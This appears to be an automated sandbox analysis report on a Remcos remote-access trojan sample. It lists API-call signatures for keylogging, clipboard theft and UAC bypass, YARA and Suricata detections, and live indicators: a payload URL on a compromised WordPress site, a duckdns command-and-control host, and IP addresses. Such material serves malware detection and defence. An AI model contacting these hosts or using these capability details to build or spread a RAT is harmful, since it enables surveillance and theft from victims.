                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040838E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004087A0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00407848
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004068CD FindFirstFileW,FindNextFileW,13_2_004068CD
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0044BA59 FindFirstFileExA,13_2_0044BA59
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040AA71
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00417AAB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040AC78
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D37665 FindFirstFileW,FindNextFileW,13_2_06D37665
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D7C7F1 FindFirstFileExA,13_2_06D7C7F1
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D385E0 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_06D385E0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D39538 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_06D39538
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D3C026 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_06D3C026
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D39126 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_06D39126
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D4ADB3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_06D4ADB3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D3BA10 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_06D3BA10
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D48843 FindFirstFileW,13_2_06D48843
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D3B809 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_06D3B809
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00406D28

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49723 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49879 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49827 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49984 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49931 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49985 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49776 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49987 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49983 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49986 -> 172.111.212.138:1950
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49988 -> 172.111.212.138:1950
                  Source: Malware configuration extractorURLs: https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc
                  Source: Malware configuration extractorURLs: craekuro.duckdns.org
                  Source: unknownDNS query: name: craekuro.duckdns.org
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECE4BC InternetCheckConnectionA,0_2_02ECE4BC
                  Source: Joe Sandbox ViewASN Name: IOMART-ASGB IOMART-ASGB
                  Source: Joe Sandbox ViewASN Name: INPL-IN-APIshansNetworkIN INPL-IN-APIshansNetworkIN
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49706 -> 103.101.59.23:443
                  Source: global trafficHTTP traffic detected: GET /wp-content/plugins/231_Ntmftfldhfc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: aarzoomarine.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00424A66 recv,9_2_00424A66
                  Source: global trafficHTTP traffic detected: GET /wp-content/plugins/231_Ntmftfldhfc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: aarzoomarine.com
                  Source: global trafficDNS traffic detected: DNS query: aarzoomarine.com
                  Source: global trafficDNS traffic detected: DNS query: craekuro.duckdns.org
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.00000000006C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mJ
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: SndVol.exe, colorcpl.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: SndVol.exe, 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.00000000006C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                  Source: 1m181Ru74o.exe, 1m181Ru74o.exe, 00000000.00000003.1296854371.000000000290C000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1460211820.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1425970905.0000000002908000.00000004.00000020.00020000.00000000.sdmp, Ntmftfld.PIF, 0000000B.00000002.1550969058.0000000002FB2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                  Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aarzoomarine.com/owa
                  Source: 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014DEC000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1424747239.000000000060E000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014DC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc
                  Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.0000000000684000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aarzoomarine.com:443/wp-content/plugins/231_Ntmftfldhfc
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownHTTPS traffic detected: 103.101.59.23:443 -> 192.168.2.11:49706 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00409340 SetWindowsHookExA 0000000D,0040932C,000000009_2_00409340
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040A65A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_00414EC1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048F5C59 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_048F5C59
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_00414EC1
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D45C59 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_06D45C59
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040A65A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,9_2_00409468

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0041A76C SystemParametersInfoW,9_2_0041A76C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048FB504 SystemParametersInfoW,9_2_048FB504
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0041A76C SystemParametersInfoW,13_2_0041A76C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D4B504 SystemParametersInfoW,13_2_06D4B504

                  System Summary

                  barindex
                  Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
